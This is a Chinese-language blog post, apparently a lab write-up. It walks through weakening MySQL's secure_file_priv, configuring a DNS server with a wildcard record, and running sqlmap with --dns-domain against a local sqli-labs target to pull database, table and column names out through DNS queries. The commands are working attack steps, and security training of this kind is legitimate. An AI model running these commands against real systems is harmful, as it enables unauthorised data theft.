当前位置:网站首页>复现dns外带数据结合sqlmap
复现dns外带数据结合sqlmap
2022-08-10 05:48:00 【鱼传尺素zz】
设置mysql的secure_file_priv属性
secure_file_priv为空,就可以读取磁盘的目录
secure_file_priv为D:\,就可以读取D盘的文件
secure_file_priv为null,load_file就不能加载文件
添加一句secure_file_priv=“”
配置dns服务器
1.添加角色
2.添加正向查找
3.新建主机
IP地址为sqlmap所在虚机的ip地址
在创建一个泛解析
使用虚拟机ping刚刚在服务端设置的域名,并且在kali中输入tcpdump -n port 53;查看信息返回。
4.创建条件转发器
SQLMap使用外带dns注入
取库
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D security --tables
获取表
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" --tables
获取列
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" -t "users" --columns
边栏推荐
- Qt程序字体初始化引起的白屏问题
- Kernel Image File Format
- Analysis of minix_super_block.s_nzones of mkfs.minix.c
- unity箭头控制物体移动
- 强化学习_03_表格方法实践(CartPole-v0 And MontoCarlo)
- Unity瓦片地图取消部分刚体效果
- Unity的GetComponentsInChildren1、2、3
- 各位大佬,oracle11g,cdc2.2,flink1.13.6,单表增量同步。在没新增数据的情
- 各位大佬 oracle cdc 默认配置 偶发会30秒才抓取到数据 这个怎么优化啊
- H3C文档NAT专题
猜你喜欢
随机推荐
椭圆曲线离散对数问题以及求解
1413. 逐步求和得到正数的最小值
机器学习_LGB调参汇总(开箱即食)
【论文解读】滴滴智能派单-KDD2018 Large-Scale Order Dispatch in On-Demand Ride-Hailing
新手使用 go channel 需要注意的问题
强化学习_06_DataWhale深度Q网络
qemu和主机共享磁盘
761. 特殊的二进制序列
强化学习_03_表格方法实践(CartPole-v0 And MontoCarlo)
Qt使用私有接口绘制窗口阴影
几行代码就可以把系统高崩溃;
如何在VMlogin中设置YiLu代理?
H2数据库如何动态插入数据
Easy to master Unity of eight prior to rendering
背包问题 c语言版
Unity瓦片地图取消部分刚体效果
虚幻5简单第三人称游戏制作文档
Qt信号槽与事件循环的关系
NetKeeper(创翼)开WIFI方法——2018.5
UnityShader入门精要-基础纹理